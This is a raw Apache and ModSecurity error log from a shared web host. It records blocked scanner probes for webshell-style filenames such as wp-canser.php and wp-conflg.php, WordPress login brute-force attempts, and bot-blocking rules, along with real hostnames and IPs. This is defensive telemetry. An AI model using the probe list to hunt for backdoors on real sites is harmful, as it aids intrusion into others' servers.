[Tue May 26 20:03:20.673904 2026] [security2:error] [pid 106517:tid 106677] [client 103.163.220.25:61449] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentynineteen/sass/forms/"] [unique_id "ahWvMIZZc2DoU1lPnP1-cQAAAKA"]
[Tue May 26 20:03:20.680103 2026] [proxy:error] [pid 112029:tid 112216] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 20:03:20.680300 2026] [proxy_http:error] [pid 112029:tid 112216] [client 67.207.87.118:51180] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 20:03:20.680991 2026] [proxy:error] [pid 112029:tid 112216] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 20:03:20.681085 2026] [proxy_http:error] [pid 112029:tid 112216] [client 67.207.87.118:51180] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 20:03:20.766059 2026] [security2:error] [pid 106517:tid 106750] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvMIZZc2DoU1lPnP1-YwAAAOg"]
[Tue May 26 20:03:20.870876 2026] [proxy:error] [pid 106517:tid 106667] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 20:03:20.870927 2026] [proxy_http:error] [pid 106517:tid 106667] [client 67.207.87.118:51188] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.quickdeliveryexp.com/
[Tue May 26 20:03:20.871543 2026] [proxy:error] [pid 106517:tid 106667] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 20:03:20.871572 2026] [proxy_http:error] [pid 106517:tid 106667] [client 67.207.87.118:51188] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcontacts.quickdeliveryexp.com/
[Tue May 26 20:03:21.164303 2026] [security2:error] [pid 106517:tid 106687] [client 103.163.220.6:40761] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/block-patterns/mmm.php"] [unique_id "ahWvMYZZc2DoU1lPnP1-hgAAAKk"]
[Tue May 26 20:03:21.256745 2026] [proxy:error] [pid 106517:tid 106679] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 20:03:21.256798 2026] [proxy_http:error] [pid 106517:tid 106679] [client 67.207.87.118:58962] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 20:03:21.257419 2026] [proxy:error] [pid 106517:tid 106679] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 20:03:21.257460 2026] [proxy_http:error] [pid 106517:tid 106679] [client 67.207.87.118:58962] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 20:03:21.655700 2026] [security2:error] [pid 106517:tid 106714] [client 103.163.220.7:56933] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/widgets-form-function.php"] [unique_id "ahWvMYZZc2DoU1lPnP1-nwAAAMQ"]
[Tue May 26 20:03:22.164829 2026] [security2:error] [pid 106517:tid 106698] [client 103.163.220.51:28159] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/true.php"] [unique_id "ahWvMoZZc2DoU1lPnP1-sQAAALQ"]
[Tue May 26 20:03:22.666617 2026] [security2:error] [pid 112029:tid 112268] [client 103.163.220.34:21071] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Requests/src/Proxy/"] [unique_id "ahWvMqFW0C-ajaCsyFdC0gAAAXc"]
[Tue May 26 20:03:23.029576 2026] [security2:error] [pid 113091:tid 113151] [remote 54.36.102.244:52384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWvMqPxBGSmlFNOy6pKFAACczs"]
[Tue May 26 20:03:23.162271 2026] [security2:error] [pid 113091:tid 113242] [client 103.163.220.13:44151] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/assets/wp-canser.php"] [unique_id "ahWvM6PxBGSmlFNOy6pKFwAAAik"]
[Tue May 26 20:03:23.213102 2026] [security2:error] [pid 113091:tid 113257] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvM6PxBGSmlFNOy6pKFgAAAjg"]
[Tue May 26 20:03:23.213135 2026] [security2:error] [pid 113091:tid 113257] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvM6PxBGSmlFNOy6pKFgAAAjg"]
[Tue May 26 20:03:23.213391 2026] [security2:error] [pid 112029:tid 112193] [client 65.109.156.37:57555] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/works/portfolio-boxed-grid/"] [unique_id "ahWvM6FW0C-ajaCsyFdC4gAAASw"]
[Tue May 26 20:03:23.275663 2026] [security2:error] [pid 113091:tid 113142] [remote 54.36.102.244:52384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWvM6PxBGSmlFNOy6pKGwACUzI"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 20:03:23.281339 2026] [security2:error] [pid 112029:tid 112215] [client 189.169.115.211:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvMqFW0C-ajaCsyFdC2AAAAUI"]
[Tue May 26 20:03:23.384100 2026] [autoindex:error] [pid 113091:tid 113328] [client 198.235.24.18:59928] AH01276: Cannot serve directory /home2/svijakqj/cercledepdy.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 20:03:23.419003 2026] [security2:error] [pid 106517:tid 106534] [remote 74.91.224.220:59948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvM4ZZc2DoU1lPnP1-ywAAqA4"]
[Tue May 26 20:03:23.520004 2026] [proxy:error] [pid 112029:tid 112258] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 20:03:23.520067 2026] [proxy_http:error] [pid 112029:tid 112258] [client 67.207.87.118:59052] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.quickdeliveryexp.com/
[Tue May 26 20:03:23.520641 2026] [proxy:error] [pid 112029:tid 112258] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 20:03:23.520673 2026] [proxy_http:error] [pid 112029:tid 112258] [client 67.207.87.118:59052] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.quickdeliveryexp.com/
[Tue May 26 20:03:23.660138 2026] [security2:error] [pid 112029:tid 112204] [client 103.163.220.9:22367] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Requests/src/Exception/177.php"] [unique_id "ahWvM6FW0C-ajaCsyFdC8wAAATc"]
[Tue May 26 20:03:23.945935 2026] [security2:error] [pid 113091:tid 113309] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvM6PxBGSmlFNOy6pKJwAAAmw"]
[Tue May 26 20:03:24.077263 2026] [security2:error] [pid 106517:tid 106575] [remote 74.91.224.220:59948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvNIZZc2DoU1lPnP1-1gAAoTc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:03:24.162353 2026] [security2:error] [pid 106517:tid 106736] [client 103.163.220.53:29779] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/certificates/doc.php"] [unique_id "ahWvNIZZc2DoU1lPnP1-4QAAANo"]
[Tue May 26 20:03:24.578130 2026] [security2:error] [pid 112029:tid 112250] [client 162.243.41.33:55667] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWvNKFW0C-ajaCsyFdC_AAAAWU"]
[Tue May 26 20:03:24.676947 2026] [security2:error] [pid 113091:tid 113288] [client 103.163.220.33:53687] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/user/mariju.php"] [unique_id "ahWvNKPxBGSmlFNOy6pKMgAAAlc"]
[Tue May 26 20:03:24.771560 2026] [security2:error] [pid 106517:tid 106668] [client 162.243.41.33:55705] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWvNIZZc2DoU1lPnP1--wAAAJc"]
[Tue May 26 20:03:25.167674 2026] [security2:error] [pid 106517:tid 106684] [client 103.163.220.28:60715] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/install-helper-new.php"] [unique_id "ahWvNYZZc2DoU1lPnP1_DAAAAKY"]
[Tue May 26 20:03:25.473755 2026] [security2:error] [pid 113091:tid 113150] [remote 52.18.195.140:54280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvNaPxBGSmlFNOy6pKPAAChjo"]
[Tue May 26 20:03:25.586952 2026] [security2:error] [pid 106517:tid 106652] [client 49.13.167.123:23412] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWvNYZZc2DoU1lPnP1_CAAAAIc"], referer: https://thegoodsporting.com
[Tue May 26 20:03:25.662400 2026] [security2:error] [pid 106517:tid 106721] [client 103.163.220.11:38145] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/site-title-restful.php"] [unique_id "ahWvNYZZc2DoU1lPnP1_HAAAAMs"]
[Tue May 26 20:03:26.168443 2026] [security2:error] [pid 113091:tid 113347] [client 103.163.220.33:36875] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/options-discussion-statement.php"] [unique_id "ahWvNqPxBGSmlFNOy6pKSAAAApI"]
[Tue May 26 20:03:26.376456 2026] [security2:error] [pid 113091:tid 113276] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvNaPxBGSmlFNOy6pKQwAAAks"]
[Tue May 26 20:03:26.686859 2026] [security2:error] [pid 106517:tid 106737] [client 103.163.220.12:35629] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/images/xmrlpc.php"] [unique_id "ahWvNoZZc2DoU1lPnP1_PwAAANs"]
[Tue May 26 20:03:27.183470 2026] [security2:error] [pid 106517:tid 106762] [client 103.163.220.9:52755] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/connects.php"] [unique_id "ahWvN4ZZc2DoU1lPnP1_VgAAAPQ"]
[Tue May 26 20:03:27.679412 2026] [security2:error] [pid 112029:tid 112176] [client 103.163.220.31:46289] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/well-known/acme-challenge/g/assets/msbp/admin.php"] [unique_id "ahWvN6FW0C-ajaCsyFdDBwAAARs"]
[Tue May 26 20:03:28.175942 2026] [security2:error] [pid 112029:tid 112285] [client 103.163.220.28:49895] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/upload.php"] [unique_id "ahWvOKFW0C-ajaCsyFdDCAAAAYg"]
[Tue May 26 20:03:28.672262 2026] [security2:error] [pid 113091:tid 113228] [client 103.163.220.36:28353] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/wp/content/aswfy/admin.php"] [unique_id "ahWvOKPxBGSmlFNOy6pKXwAAAhs"]
[Tue May 26 20:03:29.047596 2026] [security2:error] [pid 106517:tid 106669] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvOIZZc2DoU1lPnP1_lQAAAJg"]
[Tue May 26 20:03:29.165650 2026] [security2:error] [pid 113091:tid 113241] [client 103.163.220.8:52705] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/rute.php"] [unique_id "ahWvOaPxBGSmlFNOy6pKagAAAig"]
[Tue May 26 20:03:29.661024 2026] [security2:error] [pid 106517:tid 106671] [client 103.125.146.81:33477] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/htt.php"] [unique_id "ahWvOYZZc2DoU1lPnP1_sAAAAJo"]
[Tue May 26 20:03:29.879768 2026] [security2:error] [pid 106517:tid 106704] [client 114.119.154.161:36781] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.aastha-enterprises.com"] [uri "/index.html"] [unique_id "ahWvOYZZc2DoU1lPnP1_tQAAALo"], referer: http://www.aastha-enterprises.com/
[Tue May 26 20:03:30.182957 2026] [security2:error] [pid 113091:tid 113273] [client 103.163.220.33:60371] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/query-pagination/yosxb.php"] [unique_id "ahWvOqPxBGSmlFNOy6pKdAAAAkg"]
[Tue May 26 20:03:30.691750 2026] [security2:error] [pid 113091:tid 113320] [client 103.163.220.24:39753] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/ezra-backup/"] [unique_id "ahWvOqPxBGSmlFNOy6pKiQAAAnc"]
[Tue May 26 20:03:30.865475 2026] [security2:error] [pid 113091:tid 113291] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvOqPxBGSmlFNOy6pKgQAAAlo"]
[Tue May 26 20:03:31.186546 2026] [security2:error] [pid 113091:tid 113334] [client 103.163.220.53:32575] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/custom-cms/"] [unique_id "ahWvO6PxBGSmlFNOy6pKlAAAAoU"]
[Tue May 26 20:03:31.219811 2026] [security2:error] [pid 113091:tid 113315] [client 185.246.188.74:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvO6PxBGSmlFNOy6pKkAACcj4"], referer: https://kingsclub.in/indoor-swimming-pool
[Tue May 26 20:03:31.671429 2026] [security2:error] [pid 106517:tid 106679] [client 103.163.220.37:50037] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/default/"] [unique_id "ahWvO4ZZc2DoU1lPnP1_0QAAAKE"]
[Tue May 26 20:03:32.170503 2026] [security2:error] [pid 106517:tid 106691] [client 103.163.220.14:28861] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/joel-test123/"] [unique_id "ahWvPIZZc2DoU1lPnP1_4QAAAK0"]
[Tue May 26 20:03:32.675791 2026] [security2:error] [pid 113091:tid 113225] [client 103.163.220.21:65321] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/okbkh/content-"] [unique_id "ahWvPKPxBGSmlFNOy6pKswAAAhg"]
[Tue May 26 20:03:33.165707 2026] [security2:error] [pid 113091:tid 113335] [client 103.163.220.38:35329] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/simple.php"] [unique_id "ahWvPaPxBGSmlFNOy6pKwAAAAoY"]
[Tue May 26 20:03:33.629020 2026] [security2:error] [pid 113091:tid 113157] [remote 216.185.214.209:60950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWvPaPxBGSmlFNOy6pKzAACMkE"]
[Tue May 26 20:03:33.641276 2026] [core:error] [pid 112029:tid 112164] [client 194.163.172.80:58723] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: binance.com
[Tue May 26 20:03:33.641305 2026] [core:error] [pid 112029:tid 112164] [client 194.163.172.80:58723] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: binance.com
[Tue May 26 20:03:33.664349 2026] [security2:error] [pid 113091:tid 113315] [client 103.163.220.37:25555] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/simple.php"] [unique_id "ahWvPaPxBGSmlFNOy6pK0gAAAnI"]
[Tue May 26 20:03:34.007985 2026] [security2:error] [pid 112029:tid 112214] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvPaFW0C-ajaCsyFdDKwAAAUE"]
[Tue May 26 20:03:34.170738 2026] [security2:error] [pid 106517:tid 106654] [client 103.163.220.48:31837] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/simple.php"] [unique_id "ahWvPoZZc2DoU1lPnP2ABAAAAIk"]
[Tue May 26 20:03:34.664990 2026] [security2:error] [pid 112029:tid 112203] [client 103.125.146.81:20991] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/css/wp-conflg.php"] [unique_id "ahWvPqFW0C-ajaCsyFdDNAAAATY"]
[Tue May 26 20:03:35.164931 2026] [security2:error] [pid 106517:tid 106718] [client 103.163.220.47:34237] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/img/bg/chosen.php"] [unique_id "ahWvP4ZZc2DoU1lPnP2AIgAAAMg"]
[Tue May 26 20:03:35.667798 2026] [security2:error] [pid 106517:tid 106708] [client 103.163.220.42:21217] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/chosen.php"] [unique_id "ahWvP4ZZc2DoU1lPnP2AMwAAAL4"]
[Tue May 26 20:03:36.166027 2026] [security2:error] [pid 106517:tid 106723] [client 103.163.220.19:32213] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/ashyihk.php"] [unique_id "ahWvQIZZc2DoU1lPnP2ARQAAAM0"]
[Tue May 26 20:03:36.285781 2026] [security2:error] [pid 106517:tid 106724] [client 114.119.157.37:44403] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/larger-keith"] [unique_id "ahWvQIZZc2DoU1lPnP2ASQAAAM4"], referer: http://haddingtonwines.com/products/page/8
